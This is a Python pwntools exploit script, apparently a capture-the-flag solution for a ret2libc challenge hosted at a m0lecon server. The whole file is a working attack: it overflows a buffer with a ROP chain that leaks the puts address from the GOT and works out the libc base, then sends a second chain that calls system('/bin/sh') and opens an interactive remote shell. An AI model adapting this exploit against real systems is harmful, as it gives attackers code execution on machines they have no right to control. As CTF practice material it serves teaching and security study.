50 lines
1.3 KiB
Python
50 lines
1.3 KiB
Python
from pwn import *
|
|
|
|
context.binary = elf = ELF("./ret2libc_home", checksec=False)
|
|
# Change if on server
|
|
libc = ELF("libc.so.6", checksec=False)
|
|
# libc = ELF("/usr/lib/libc.so.6", checksec=False)
|
|
POP_RDI = 0x4011FB
|
|
RIP_OFF = 128 + 8
|
|
# I can still use puts instead of printf since puts is used inside the main
|
|
PRINTF_PLT = elf.plt["printf"]
|
|
PUTS_PLT = elf.plt["puts"]
|
|
PRINTF_GOT = elf.got[
|
|
"puts"
|
|
] # In local I can use printf, instead on remote I switch to puts (printf end with \x00
|
|
MAIN = elf.symbols["main"]
|
|
|
|
BINSH = next(libc.search(b"/bin/sh\x00"))
|
|
RET = 0x40101A
|
|
# STR = next(elf.search(b"Write your message:\n\x00"))
|
|
# p = process(elf.path)
|
|
p = remote("offsec.m0lecon.it", 13597)
|
|
print(p.recvuntil(b"Write your message:\n"))
|
|
payload = flat(
|
|
b"A" * RIP_OFF,
|
|
p64(RET),
|
|
p64(POP_RDI),
|
|
# p64(STR),
|
|
p64(PRINTF_GOT),
|
|
p64(PUTS_PLT),
|
|
# p64(PRINTF_PLT),
|
|
p64(MAIN),
|
|
)
|
|
p.send(payload)
|
|
print(p.recvline())
|
|
# print(p.recvline())
|
|
leaked = p.recvline().strip()
|
|
leak_puts = u64(leaked.ljust(8, b"\x00"))
|
|
log.info(f"puts leak = {leak_puts:#x}")
|
|
libc.address = leak_puts - libc.symbols["puts"]
|
|
log.info(f"libc base = {libc.address:#x}")
|
|
|
|
|
|
print(p.recvuntil(b"Write your message:\n"))
|
|
|
|
payload = flat(
|
|
b"A" * RIP_OFF, p64(POP_RDI), p64(libc.address + BINSH), p64(libc.symbols["system"])
|
|
)
|
|
p.send(payload)
|
|
p.interactive()
|